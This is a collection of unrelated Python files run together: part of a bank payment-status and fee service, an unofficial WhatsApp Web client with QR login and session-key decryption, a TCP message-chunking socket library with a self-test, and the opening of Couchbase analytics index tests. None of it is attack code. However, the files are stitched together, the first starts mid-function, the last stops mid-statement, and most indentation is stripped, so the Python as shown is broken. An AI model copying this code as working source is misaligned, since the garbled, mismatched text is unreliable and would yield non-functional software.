customer_no, customer_error, error_flg = make_payment_for_customer(customer_no, req_intr_bk_sttl_amt, req_orgnl_tx_id, req_bank_prtry_id, req_bank_id, snd_fee, swf_fee, rcv_fee)
if int(error_flg) == 1:
update_psh_status(doc_name, '0', req_tx_sts, customer_error)
else:
update_psh_status(doc_name, '1', req_tx_sts)
else:
update_psh_status(doc_name, '0', req_tx_sts)
else:
update_psh_status(doc_name, '0', req_tx_sts)
def get_transfer_fee(req_orgnl_tx_id, doc_name):
ret_fees, our_zone_code = "0", "00"
#doc_name = frappe.db.get_value("Bank Payment Received", {"req_bank_tx_id":req_orgnl_tx_id}, ["name"])
req_file_name, res_file_name, req_xml_path, res_xml_path, site_name, private_path, req_path, res_path = get_service_files_names('Fees', 'StatusFileSerIn')
res_bank_id, req_bank_id, req_bank_bldg, req_bank_acct, req_bank_amt, currency_code, fees_password, our_zone_code, fees_url, fetch_fees = get_fees_data(doc_name)
if fetch_fees == 0:
return "0"
fees_xml_req = create_fees_xml_doc(req_xml_path, req_bank_id, fees_password, str(req_bank_amt).strip(), res_bank_id, req_bank_bldg, our_zone_code, currency_code, req_orgnl_tx_id)
save_payment_file_db(site_name, req_file_name, req_xml_path, private_path, req_path, doc_name)
req_fees_url = fees_url#frappe.db.get_value("Bank Service Control", "260", ["rec_text"])
try:
headers = {'Content-Type': 'application/xml'}
session = requests.Session()
retry = Retry(connect=3, backoff_factor=0.5)
adapter = HTTPAdapter(max_retries=retry)
session.mount('http://', adapter)
session.mount('https://', adapter)
res_xml = session.post(url= req_fees_url, data=fees_xml_req.encode("utf-8"), headers=headers).text
with open(res_xml_path, "w") as f:
f.write(res_xml)
f.close()
save_payment_file_db(site_name, res_file_name, res_xml_path, private_path, res_path, doc_name)
retail, switch, interchange, result, transactionid, errordesc = read_xml_fees_data(res_xml)
update_payment_fees_data(doc_name, retail, switch, interchange, transactionid, result, errordesc)
ret_fees = interchange
except:
try:
update_payment_fees_data(doc_name, "0", "0", "0", "", "error", sys.exc_info()[0])
except:
update_payment_fees_data(doc_name, "0", "0", "0", "", "error", '')
return "0"
def validate_status_request(status_xml):
(header_from, header_to, req_bank_biz_msg_idr, req_bank_msg_def_idr, req_bank_cre_dt, res_bank_biz_msg_idr, res_bank_msg_def_idr, res_bank_cre_dt,
req_bank_cre_dt_tm, req_bank_msg_id, req_bank_id, res_orgnl_msg_id, res_orgnl_msg_nm_id, res_orgnl_cre_dt_tm, req_orgnl_tx_id, req_tx_sts,
req_intr_bk_sttl_amt, req_intr_bk_sttl_amt_ccy, req_nm, req_adr_line, req_bank_client_id, req_bank_prtry_id, req_accptnc_dt_tm) = read_status_xml(status_xml)
our_biz_msg_idr_serial = get_table_serial_key('StatusSerialIn_RS')
(res_status, payment_doc_name, rv_req_bank_id, rv_req_bank_acct_id, rv_req_bank_prtry_id, rv_req_bank_intr_bk_sttlm_amt, rv_req_bank_intr_bk_sttlm_amt_ccy,
rv_res_bank_tx_sts, rv_timer_exceed_flg, rv_status_recieved_flg, rv_req_bank_debit_id, rv_req_bank_debit_prt) = get_status_data(req_orgnl_tx_id)
req_bank_accptnc_dt_tm = ''
# print(res_status, payment_doc_name, rv_req_bank_id, rv_req_bank_acct_id, rv_req_bank_prtry_id, rv_req_bank_intr_bk_sttlm_amt, rv_req_bank_intr_bk_sttlm_amt_ccy,
# rv_res_bank_tx_sts, rv_timer_exceed_flg, rv_status_recieved_flg, rv_req_bank_debit_id, rv_req_bank_debit_prt)
#or req_bank_prtry_id != rv_req_bank_prtry_id or req_bank_id != rv_req_bank_id or req_bank_client_id != rv_req_bank_acct_id
if not validate_req_bank(req_bank_id) or not res_status or rv_res_bank_tx_sts != 'ACSC' or req_bank_prtry_id != rv_req_bank_prtry_id or req_bank_id != rv_req_bank_id or req_bank_client_id != rv_req_bank_acct_id or rv_req_bank_intr_bk_sttlm_amt_ccy != req_intr_bk_sttl_amt_ccy or float(rv_req_bank_intr_bk_sttlm_amt) != float(req_intr_bk_sttl_amt):
status_res_xml, doc_name = create_status_res_xml(str(our_biz_msg_idr_serial), header_from, header_to, req_bank_id, req_bank_biz_msg_idr, req_bank_msg_def_idr,
req_bank_cre_dt, res_bank_biz_msg_idr, res_bank_msg_def_idr, res_bank_cre_dt, req_bank_msg_id, req_bank_cre_dt_tm, req_bank_accptnc_dt_tm,
res_orgnl_msg_id, res_orgnl_msg_nm_id, res_orgnl_cre_dt_tm, req_orgnl_tx_id, req_accptnc_dt_tm, "TNFN", "false", req_intr_bk_sttl_amt, req_intr_bk_sttl_amt_ccy,
req_adr_line, req_nm, req_bank_client_id, req_bank_prtry_id, rv_req_bank_debit_id, rv_req_bank_debit_prt)
else:
if int(rv_timer_exceed_flg) > 0:
status_res_xml, doc_name = create_status_res_xml(str(our_biz_msg_idr_serial), header_from, header_to, req_bank_id, req_bank_biz_msg_idr, req_bank_msg_def_idr,
req_bank_cre_dt, res_bank_biz_msg_idr, res_bank_msg_def_idr, res_bank_cre_dt, req_bank_msg_id, req_bank_cre_dt_tm, req_bank_accptnc_dt_tm,
res_orgnl_msg_id, res_orgnl_msg_nm_id, res_orgnl_cre_dt_tm, req_orgnl_tx_id, req_accptnc_dt_tm, "LTXD", "false", req_intr_bk_sttl_amt, req_intr_bk_sttl_amt_ccy,
req_adr_line, req_nm, req_bank_client_id, req_bank_prtry_id, rv_req_bank_debit_id, rv_req_bank_debit_prt)
else:
            if int(rv_status_recieved_flg) > 0:
status_res_xml, doc_name = create_status_res_xml(str(our_biz_msg_idr_serial), header_from, header_to, req_bank_id, req_bank_biz_msg_idr, req_bank_msg_def_idr,
req_bank_cre_dt, res_bank_biz_msg_idr, res_bank_msg_def_idr, res_bank_cre_dt, req_bank_msg_id, req_bank_cre_dt_tm, req_bank_accptnc_dt_tm,
res_orgnl_msg_id, res_orgnl_msg_nm_id, res_orgnl_cre_dt_tm, req_orgnl_tx_id, req_accptnc_dt_tm, "DTID", "false", req_intr_bk_sttl_amt, req_intr_bk_sttl_amt_ccy,
req_adr_line, req_nm, req_bank_client_id, req_bank_prtry_id, rv_req_bank_debit_id, rv_req_bank_debit_prt)
else:
customer_no, customer_error, error_flg = req_bank_client_id, '', 0
snd_fee, swf_fee, rcv_fee = "0", get_transfer_fee(req_orgnl_tx_id, payment_doc_name),"0"
customer_no, customer_error, error_flg = make_payment_for_customer(customer_no, req_intr_bk_sttl_amt, req_orgnl_tx_id, rv_req_bank_debit_id, req_bank_id, snd_fee, swf_fee, rcv_fee)
if error_flg == 1:
update_psh_status(payment_doc_name, '0', 'Server Error', customer_error)
status_res_xml, doc_name = create_status_res_xml(str(our_biz_msg_idr_serial), header_from, header_to, req_bank_id, req_bank_biz_msg_idr, req_bank_msg_def_idr,
req_bank_cre_dt, res_bank_biz_msg_idr, res_bank_msg_def_idr, res_bank_cre_dt, req_bank_msg_id, req_bank_cre_dt_tm, req_bank_accptnc_dt_tm,
res_orgnl_msg_id, res_orgnl_msg_nm_id, res_orgnl_cre_dt_tm, req_orgnl_tx_id, req_accptnc_dt_tm, customer_error, "false", req_intr_bk_sttl_amt, req_intr_bk_sttl_amt_ccy,
req_adr_line, req_nm, req_bank_client_id, req_bank_prtry_id, rv_req_bank_debit_id, rv_req_bank_debit_prt)
else:
update_status_flg(payment_doc_name, '1')
status_res_xml, doc_name = create_status_res_xml(str(our_biz_msg_idr_serial), header_from, header_to, req_bank_id, req_bank_biz_msg_idr, req_bank_msg_def_idr,
req_bank_cre_dt, res_bank_biz_msg_idr, res_bank_msg_def_idr, res_bank_cre_dt, req_bank_msg_id, req_bank_cre_dt_tm, req_bank_accptnc_dt_tm,
res_orgnl_msg_id, res_orgnl_msg_nm_id, res_orgnl_cre_dt_tm, req_orgnl_tx_id, req_accptnc_dt_tm, "ACSC", "true", req_intr_bk_sttl_amt, req_intr_bk_sttl_amt_ccy,
req_adr_line, req_nm, req_bank_client_id, req_bank_prtry_id, rv_req_bank_debit_id, rv_req_bank_debit_prt)
return status_res_xml, doc_name
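# --- Hedged illustration (not part of the service) ---
# A standalone sketch of the retried-POST pattern used in get_transfer_fee()
# above: a requests.Session is mounted with an HTTPAdapter whose urllib3 Retry
# re-attempts failed connections with exponential backoff.  The function name
# and parameters are hypothetical; only the Session/Retry/HTTPAdapter wiring
# mirrors the code above.
def _post_xml_with_retries(url, xml_body, connect_retries=3, backoff=0.5, timeout=15):
    session = requests.Session()
    retry = Retry(connect=connect_retries, backoff_factor=backoff)
    adapter = HTTPAdapter(max_retries=retry)
    session.mount('http://', adapter)
    session.mount('https://', adapter)
    headers = {'Content-Type': 'application/xml'}
    return session.post(url=url, data=xml_body.encode('utf-8'), headers=headers, timeout=timeout).text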
|
whatsapp.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys;
sys.dont_write_bytecode = True;
import os;
import signal;
import base64;
import math;
import time;
import datetime;
import json;
import io;
from time import sleep;
from threading import Thread;
from Crypto.Cipher import AES;
from Crypto.Hash import SHA256;
import hashlib;
import hmac;
import traceback;
import websocket;
import curve25519;
import pyqrcode;
from utilities import *;
from whatsapp_binary_reader import whatsappReadBinary;
reload(sys);
sys.setdefaultencoding("utf-8");
def HmacSha256(key, sign):
return hmac.new(key, sign, hashlib.sha256).digest();
def HKDF(key, length, appInfo=""): # implements RFC 5869, some parts from https://github.com/MirkoDziadzka/pyhkdf
key = HmacSha256("\0"*32, key);
keyStream = "";
keyBlock = "";
blockIndex = 1;
while len(keyStream) < length:
keyBlock = hmac.new(key, msg=keyBlock+appInfo+chr(blockIndex), digestmod=hashlib.sha256).digest();
blockIndex += 1;
keyStream += keyBlock;
return keyStream[:length];
def AESPad(s):
bs = AES.block_size;
return s + (bs - len(s) % bs) * chr(bs - len(s) % bs);
def AESUnpad(s):
return s[:-ord(s[len(s)-1:])];
def AESEncrypt(key, plaintext): # like "AESPad"/"AESUnpad" from https://stackoverflow.com/a/21928790
plaintext = AESPad(plaintext);
iv = os.urandom(AES.block_size);
cipher = AES.new(key, AES.MODE_CBC, iv);
return iv + cipher.encrypt(plaintext);
def WhatsAppEncrypt(encKey, macKey, plaintext):
enc = AESEncrypt(encKey, plaintext)
return enc + HmacSha256(macKey, enc); # this may need padding to 64 byte boundary
def AESDecrypt(key, ciphertext): # from https://stackoverflow.com/a/20868265
iv = ciphertext[:AES.block_size];
cipher = AES.new(key, AES.MODE_CBC, iv);
plaintext = cipher.decrypt(ciphertext[AES.block_size:]);
return AESUnpad(plaintext);
class WhatsAppWebClient:
websocketIsOpened = False;
onOpenCallback = None;
onMessageCallback = None;
onCloseCallback = None;
activeWs = None;
websocketThread = None;
messageQueue = {}; # maps message tags (provided by WhatsApp) to more information (description and callback)
loginInfo = {
"clientId": None,
"serverRef": None,
"privateKey": None,
"publicKey": None,
"key": {
"encKey": None,
"macKey": None
}
};
connInfo = {
"clientToken": None,
"serverToken": None,
"browserToken": None,
"secret": None,
"sharedSecret": None,
"me": None
};
def __init__(self, onOpenCallback, onMessageCallback, onCloseCallback):
self.onOpenCallback = onOpenCallback;
self.onMessageCallback = onMessageCallback;
self.onCloseCallback = onCloseCallback;
websocket.enableTrace(True);
self.connect();
def onOpen(self, ws):
try:
self.websocketIsOpened = True;
if self.onOpenCallback is not None and "func" in self.onOpenCallback:
self.onOpenCallback["func"](self.onOpenCallback);
eprint("WhatsApp backend Websocket opened.");
except:
eprint(traceback.format_exc());
def onError(self, ws, error):
eprint(error);
def onClose(self, ws):
self.websocketIsOpened = False;
if self.onCloseCallback is not None and "func" in self.onCloseCallback:
self.onCloseCallback["func"](self.onCloseCallback);
eprint("WhatsApp backend Websocket closed.");
def onMessage(self, ws, message):
try:
messageSplit = message.split(",", 1);
messageTag = messageSplit[0];
messageContent = messageSplit[1];
if messageTag in self.messageQueue: # when the server responds to a client's message
pend = self.messageQueue[messageTag];
if pend["desc"] == "_login":
eprint("Message after login: ", message);
self.loginInfo["serverRef"] = json.loads(messageContent)["ref"];
eprint("set server id: " + self.loginInfo["serverRef"]);
self.loginInfo["privateKey"] = curve25519.Private();
self.loginInfo["publicKey"] = self.loginInfo["privateKey"].get_public();
qrCodeContents = self.loginInfo["serverRef"] + "," + base64.b64encode(self.loginInfo["publicKey"].serialize()) + "," + self.loginInfo["clientId"];
eprint("qr code contents: " + qrCodeContents);
svgBuffer = io.BytesIO(); # from https://github.com/mnooner256/pyqrcode/issues/39#issuecomment-207621532
pyqrcode.create(qrCodeContents, error='L').svg(svgBuffer, scale=6, background="rgba(0,0,0,0.0)", module_color="#122E31", quiet_zone=0);
if "callback" in pend and pend["callback"] is not None and "func" in pend["callback"] and pend["callback"]["func"] is not None and "tag" in pend["callback"] and pend["callback"]["tag"] is not None:
pend["callback"]["func"]({ "type": "generated_qr_code", "image": "data:image/svg+xml;base64," + base64.b64encode(svgBuffer.getvalue()), "content": qrCodeContents }, pend["callback"]);
else:
try:
jsonObj = json.loads(messageContent); # try reading as json
except ValueError, e:
if messageContent != "":
hmacValidation = HmacSha256(self.loginInfo["key"]["macKey"], messageContent[32:]);
if hmacValidation != messageContent[:32]:
raise ValueError("Hmac mismatch");
decryptedMessage = AESDecrypt(self.loginInfo["key"]["encKey"], messageContent[32:]);
try:
processedData = whatsappReadBinary(decryptedMessage, True);
messageType = "binary";
except:
processedData = { "traceback": traceback.format_exc().splitlines() };
messageType = "error";
finally:
self.onMessageCallback["func"](processedData, self.onMessageCallback, { "message_type": messageType });
else:
self.onMessageCallback["func"](jsonObj, self.onMessageCallback, { "message_type": "json" });
if isinstance(jsonObj, list) and len(jsonObj) > 0: # check if the result is an array
eprint(json.dumps(jsonObj));
if jsonObj[0] == "Conn":
self.connInfo["clientToken"] = jsonObj[1]["clientToken"];
self.connInfo["serverToken"] = jsonObj[1]["serverToken"];
self.connInfo["browserToken"] = jsonObj[1]["browserToken"];
self.connInfo["me"] = jsonObj[1]["wid"];
self.connInfo["secret"] = base64.b64decode(jsonObj[1]["secret"]);
self.connInfo["sharedSecret"] = self.loginInfo["privateKey"].get_shared_key(curve25519.Public(self.connInfo["secret"][:32]), lambda a: a);
sse = self.connInfo["sharedSecretExpanded"] = HKDF(self.connInfo["sharedSecret"], 80);
hmacValidation = HmacSha256(sse[32:64], self.connInfo["secret"][:32] + self.connInfo["secret"][64:]);
if hmacValidation != self.connInfo["secret"][32:64]:
raise ValueError("Hmac mismatch");
keysEncrypted = sse[64:] + self.connInfo["secret"][64:];
keysDecrypted = AESDecrypt(sse[:32], keysEncrypted);
self.loginInfo["key"]["encKey"] = keysDecrypted[:32];
self.loginInfo["key"]["macKey"] = keysDecrypted[32:64];
# eprint("private key : ", base64.b64encode(self.loginInfo["privateKey"].serialize()));
# eprint("secret : ", base64.b64encode(self.connInfo["secret"]));
# eprint("shared secret : ", base64.b64encode(self.connInfo["sharedSecret"]));
# eprint("shared secret expanded : ", base64.b64encode(self.connInfo["sharedSecretExpanded"]));
# eprint("hmac validation : ", base64.b64encode(hmacValidation));
# eprint("keys encrypted : ", base64.b64encode(keysEncrypted));
# eprint("keys decrypted : ", base64.b64encode(keysDecrypted));
eprint("set connection info: client, server and browser token; secret, shared secret, enc key, mac key");
eprint("logged in as " + jsonObj[1]["pushname"] + " (" + jsonObj[1]["wid"] + ")");
elif jsonObj[0] == "Stream":
pass;
elif jsonObj[0] == "Props":
pass;
except:
eprint(traceback.format_exc());
def connect(self):
self.activeWs = websocket.WebSocketApp("wss://w1.web.whatsapp.com/ws",
on_message = lambda ws, message: self.onMessage(ws, message),
on_error = lambda ws, error: self.onError(ws, error),
on_open = lambda ws: self.onOpen(ws),
on_close = lambda ws: self.onClose(ws),
header = { "Origin: https://web.whatsapp.com" });
self.websocketThread = Thread(target = self.activeWs.run_forever);
self.websocketThread.daemon = True;
self.websocketThread.start();
def generateQRCode(self, callback=None):
self.loginInfo["clientId"] = base64.b64encode(os.urandom(16));
messageTag = str(getTimestamp());
self.messageQueue[messageTag] = { "desc": "_login", "callback": callback };
message = messageTag + ',["admin","init",[0,2,9929],["Chromium at ' + datetime.datetime.now().isoformat() + '","Chromium"],"' + self.loginInfo["clientId"] + '",true]';
self.activeWs.send(message);
def getLoginInfo(self, callback):
callback["func"]({ "type": "login_info", "data": self.loginInfo }, callback);
def getConnectionInfo(self, callback):
callback["func"]({ "type": "connection_info", "data": self.connInfo }, callback);
def disconnect(self):
self.activeWs.send('goodbye,,["admin","Conn","disconnect"]'); # WhatsApp server closes connection automatically when client wants to disconnect
#time.sleep(0.5);
#self.activeWs.close();
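# A minimal sketch of the session-key derivation performed by the "Conn" handler in
# onMessage() above, pulled out as a standalone helper for readability. It reuses the
# HKDF, HmacSha256 and AESDecrypt helpers assumed to exist in this module; the 80-byte
# expansion and the slice offsets mirror the handler itself, not an official spec.
def deriveSessionKeys(sharedSecret, secret):
    expanded = HKDF(sharedSecret, 80);                                  # 32B AES key | 32B HMAC key | 16B remainder
    if HmacSha256(expanded[32:64], secret[:32] + secret[64:]) != secret[32:64]:
        raise ValueError("Hmac mismatch");                              # server-provided secret failed validation
    keysDecrypted = AESDecrypt(expanded[:32], expanded[64:] + secret[64:]);
    return keysDecrypted[:32], keysDecrypted[32:64];                    # (encKey, macKey)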
|
chunkystreamsocket.py
|
#!/usr/bin/env python3
# vim ts=4,fileencoding=utf-8
# SPDX-License-Identifier: Apache-2.0
# SPDXID: pymisclib-1
# PackageCopyrightText: © Copyright 2012-2022 by Christian Dönges <cd@platypus-projects.de>
# PackageDownloadLocation: None
# PackageHomePage: https://github.com/cdoenges/pymisclib
# PackageName: pymisclib
# PackageOriginator: Originator: Platypus Projects GmbH
# PackageSourceInfo: <text>uses pymisclib from https://github.com/cdoenges/pymisclib.</text>
# PackageSupplier: Christian Dönges (cd@platypus-projects.de)
# PackageVersion: 1.0.0
"""A socket used to send and receive message chunks over a TCP connection.
:LICENSE:
© Copyright 2017 by Christian Dönges <cd@platypus-projects.de>
Licensed under the Apache License, Version 2.0 (the "License"); you may
not use this file except in compliance with the License. You may obtain a
copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
If you need another license, contact the author to discuss terms.
"""
# pylint: disable=consider-using-assignment-expr
from dataclasses import dataclass
import logging
import socket
@dataclass
class ChunkyStreamSocket:
"""Socket used to send message chunks over a TCP connection."""
host: str = '127.0.0.1'
port: int = 10000
sock: socket.socket = None
logger: logging.Logger = logging.getLogger(__name__)
debug: bool = False
log_n_bytes: int = 0 # number of communicated bytes to log
_backlog_bytes: bytes = None
def __post_init__(self):
"""Custom initializer called after __init__().
"""
if self.sock is None:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def bind_and_listen(self, backlog: int = 5, timeout: float = None):
"""Bind to the host and port to make a server socket.
:param int backlog: The maximum number of queued connections.
:param float timeout: The number of seconds after which socket
operations will time out. Set to None for a blocking socket.
"""
self.logger.debug('bind_and_listen(%s:%u)', self.host, self.port)
# Set the timeout.
self.sock.settimeout(timeout)
# Allow the server socket to re-bind immediately.
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind the socket to the given address and port.
self.sock.bind((self.host, self.port))
# Start listening for a connection attempt.
self.sock.listen(backlog)
def accept(self) -> tuple[socket.socket, tuple[str, int]]:
"""Accept a client connection on the (server) socket.
:return: The client socket and client address tuple.
:rtype tuple(socket, tuple(host, port))
:raises: TimeoutError
"""
try:
(client_sock, client_addr) = self.sock.accept() # pylint: disable=no-member
except socket.timeout as ex:
raise TimeoutError('accept() timed out') from ex
self.logger.debug('accept(%s)', client_addr)
return (client_sock, client_addr)
def close(self):
"""Close the socket."""
try:
self.sock.shutdown(socket.SHUT_RDWR)
except OSError:
# Ignore errors in shutdown since we close the socket anyways.
pass
self.sock.close()
self.sock = None
self.logger.debug('close()')
def connect(self, timeout: float = None):
"""Connect client socket to the server at host:port.
:param float timeout: The number of seconds after which socket
operations will time out. Set to None for a blocking socket.
:raises: ConnectionError
"""
self.logger.debug('connect(%s:%u)', self.host, self.port)
# Set the timeout.
self.sock.settimeout(timeout)
# Allow server socket to re-bind immediately.
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
self.sock.connect((self.host, self.port))
except OSError as ex:
self.logger.error('Connection attempt to %s:%u failed: %s',
self.host, self.port, ex)
raise ConnectionError('unable to connect') from ex
self.logger.debug('Connected to %s:%s', self.host, self.port)
def send(self, msg_bytes: bytes) -> int:
"""Send the bytes.
:Parameters:
msg_bytes -- The bytes to send. If the receiver is expecting a
separator, it must be appended to the message by the caller.
:Return:
The number of bytes sent.
:Raises:
RuntimeError
"""
total_nr_sent = 0
while total_nr_sent < len(msg_bytes):
current_nr_sent = self.sock.send(msg_bytes[total_nr_sent:])
if current_nr_sent == 0:
self.logger.debug('self.sock.send() failed.')
raise RuntimeError("socket connection broken")
total_nr_sent = total_nr_sent + current_nr_sent
if self.log_n_bytes != 0:
self.logger.debug('--> %s', msg_bytes[:self.log_n_bytes])
return total_nr_sent
def recv(self, length: int, timeout: float = None):
"""Receive length bytes from the socket.
This function handles chunked data (i.e. the data to receive is split
into multiple packets). If more data than expected is received, it is
placed into a backlog buffer until the next call to a receive
function.
:Parameters:
length -- The number of bytes to read.
timeout -- Timeout in seconds or None to block.
:Return:
The received bytes.
:Raises:
RuntimeError
TimeoutError
"""
chunks = []
nr_received = 0
# Retrieve the backlog from the previous recv() call and use it as the
# first chunk.
if self._backlog_bytes is not None:
chunks.append(self._backlog_bytes)
nr_received = len(self._backlog_bytes)
self._backlog_bytes = None
# Set the timeout.
self.sock.settimeout(timeout)
# Receive bytes until we have enough to satisfy the length requirement.
while nr_received < length:
recv_len = min(length - nr_received, 4096)
chunk = self.sock.recv(recv_len)
if self.debug:
self.logger.debug('socket.recv(%u) := %s', recv_len, chunk)
if chunk == b'':
raise RuntimeError("socket connection broken")
chunks.append(chunk)
nr_received = nr_received + len(chunk)
# Join all chunks into one message.
msg_bytes = b''.join(chunks)
# Cut off the part that is too long.
if len(msg_bytes) > length:
self._backlog_bytes = msg_bytes[length:]
msg_bytes = msg_bytes[:length]
if self.log_n_bytes != 0:
self.logger.debug('<-- %s', msg_bytes[:self.log_n_bytes])
return msg_bytes
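# Note on the backlog: recv() only trims a surplus when a previous receive call (for
# example recv_to_separator(), which reads up to 4096 bytes at a time) has parked extra
# bytes in self._backlog_bytes. E.g. if 10 bytes are waiting in the backlog, recv(4)
# returns the first 4 and leaves the remaining 6 for the next receive call.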
def recv_to_separator(self, separator: bytes):
"""Receive bytes until the given separator is found.
This function handles chunked data (i.e. the data to receive is
split into multiple packets). If more data than expected is
received, it is placed into a backlog buffer until the next call
to a receive function.
:Parameters:
separator -- One or more bytes that separate messages in the TCP
stream.
:Return:
The received bytes.
:Raises:
RuntimeError
TimeoutError
"""
self.logger.debug('recv_to_separator(%s)', separator)
start_search_index = 0
chunk = b''
msg_bytes = b''
while True:
if self._backlog_bytes is not None and len(self._backlog_bytes) > 0:
# The first time around, process the backlog.
chunk = self._backlog_bytes
self._backlog_bytes = None
if self.debug:
self.logger.debug('backlog chunk = %s', chunk)
else:
chunk = self.sock.recv(4096)
if self.debug:
self.logger.debug('socket.recv(4096) := %s', chunk)
if chunk == b'':
raise RuntimeError("socket connection broken")
msg_bytes = msg_bytes + chunk
start_separator_index = msg_bytes.find(separator, start_search_index)
if start_separator_index > -1:
# We found the separator at index start_separator_index.
self._backlog_bytes = msg_bytes[start_separator_index + len(separator):]
if self.debug:
self.logger.debug('Backlog: %u bytes', len(self._backlog_bytes))
msg_bytes = msg_bytes[:start_separator_index]
break
# The separator could have started in the current chunk but
# finishes in the next chunk, so we need to search the
# len(separator) - 1 last bytes of the separator again
start_search_index = max(0, len(msg_bytes) - (len(separator) - 1))
if self.log_n_bytes != 0:
self.logger.debug('<-- %s', msg_bytes[:self.log_n_bytes])
return msg_bytes
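# Minimal client-side usage sketch (hypothetical host, port and separator; unrelated
# to the self-test below): connect, send one separator-terminated message, read the
# reply. Bytes received after the separator stay in the backlog buffer and are
# consumed by the next receive call.
#
#   css = ChunkyStreamSocket(host='192.0.2.10', port=7000)
#   css.connect(timeout=5.0)
#   css.send(b'hello' + b'\n')
#   reply = css.recv_to_separator(b'\n')
#   css.close()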
if __name__ == '__main__':
import sys
from threading import Barrier, BrokenBarrierError, Thread
from time import sleep
start_barrier = Barrier(2, timeout=5)
end_barrier = Barrier(3, timeout=60)
MSG_SEP = b'\0\1\2\1\0'
messages = [
b'abcdef',
b'1234',
b'a', b'bc', b'de\0', b'\1\2\1\0fghi',
b'xyzZYX',
b'',
b'+++',
]
def server():
"""Test server."""
logger = logging.getLogger('server')
logger.info('server starting')
server_socket = ChunkyStreamSocket(logger=logging.getLogger('server.socket'))
server_socket.bind_and_listen(timeout=60)
logger.debug('server_socket = %s', server_socket.sock)
start_barrier.wait()
logger.info('server running')
(accepted_socket, client_addr) = server_socket.accept()
logger.debug('Accepted client from %s:%u', client_addr[0], client_addr[1])
cs = ChunkyStreamSocket(sock=accepted_socket,
logger=logging.getLogger('server.cs'))
while True:
msg = cs.recv_to_separator(MSG_SEP)
logger.info('MSG: %s', msg)
if msg == b'+++':
logger.debug('EOF received')
break
logger.info('server closing connection')
cs.close()
server_socket.close()
try:
end_barrier.wait()
except BrokenBarrierError:
logger.error('server() end_barrier broken')
def client():
"""Test client."""
logger = logging.getLogger('client')
logger.info('client starting')
client_socket = ChunkyStreamSocket(logger=logging.getLogger('client.socket'))
logger.debug('client_socket = %s', client_socket.sock)
start_barrier.wait()
logger.info('client running')
client_socket.connect()
for message in messages:
try:
client_socket.send(message + MSG_SEP)
except RuntimeError as e:
logger.critical('send(%u) failed: %s', len(message + MSG_SEP), e)
logger.critical('client terminating')
break
try:
end_barrier.wait()
except BrokenBarrierError:
logger.error('client() end_barrier broken')
finally:
client_socket.close()
# Log everything to the console.
main_logger = logging.getLogger()
main_logger.setLevel(logging.NOTSET)
ch = logging.StreamHandler()
ch.setLevel(logging.NOTSET)
formatter = logging.Formatter('%(asctime)s - %(name)20s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
main_logger.addHandler(ch)
server_thread = Thread(target=server, args=())
client_thread = Thread(target=client, args=())
server_thread.start()
sleep(1.0) # give the server time to set up before starting client.
client_thread.start()
main_logger.info('Client and server running.')
try:
end_barrier.wait(timeout=5)
except BrokenBarrierError:
main_logger.error('Barrier broken. Terminating')
sys.exit(0)
|
cbas_secondary_indexes.py
|
import threading
import random
from TestInput import TestInputSingleton
from cbas.cbas_base import CBASBaseTest
class CBASSecondaryIndexes(CBASBaseTest):
def setUp(self):
self.input = TestInputSingleton.input
if "default_bucket" not in self.input.test_params:
self.input.test_params.update({"default_bucket": False})
super(CBASSecondaryIndexes, self).setUp()
self.load_sample_buckets(servers=[self.cluster.master],
bucketName=self.cb_bucket_name,
total_items=self.beer_sample_docs_count)
if "add_all_cbas_nodes" in self.input.test_params and \
self.input.test_params["add_all_cbas_nodes"] and len(
self.cluster.cbas_nodes) > 1:
self.cluster_util.add_all_nodes_then_rebalance(
self.cluster, self.cluster.cbas_nodes)
self.cbas_util.createConn(self.cb_bucket_name)
# Create dataset on the CBAS bucket
self.cbas_util.create_dataset_on_bucket(
cbas_bucket_name=self.cb_bucket_name,
cbas_dataset_name=self.cbas_dataset_name,
compress_dataset=self.compress_dataset)
def tearDown(self):
super(CBASSecondaryIndexes, self).tearDown()
def verify_index_used(self, statement, index_used=False, index_name=None):
statement = 'EXPLAIN %s'%statement
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
statement)
self.assertEquals(status, "success")
if status == 'success':
self.assertEquals(errors, None)
if index_used:
self.assertTrue("index-search" in str(results))
self.assertFalse("data-scan" in str(results))
self.log.info("INDEX-SEARCH is found in EXPLAIN hence indexed data will be scanned to serve %s"%statement)
if index_name:
self.assertTrue(index_name in str(results))
else:
self.assertTrue("data-scan" in str(results))
self.assertFalse("index-search" in str(results))
self.log.info("DATA-SCAN is found in EXPLAIN hence index is not used to serve %s"%statement)
def test_create_index(self):
'''
Steps :
1. Create bucket in CBAS, create dataset
2. Create index on various fields as passed in the parameters
3. Validate if the index is created and the index definition has the expected fields
Author : Mihir Kamdar
Created date : 8/1/2017
'''
# Create Index
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
def test_create_index_without_if_not_exists(self):
'''
Steps :
1. Create bucket in CBAS, create dataset
2. Create index
3. Again create an index with the same name without using IF_NOT_EXISTS clause
4. Validate that the error msg is as expected
Author : Mihir Kamdar
Created date : 8/1/2017
'''
# Create Index
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
# Create another index with same name
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(self.cbas_util.validate_error_in_response(status, errors, self.expected_error),
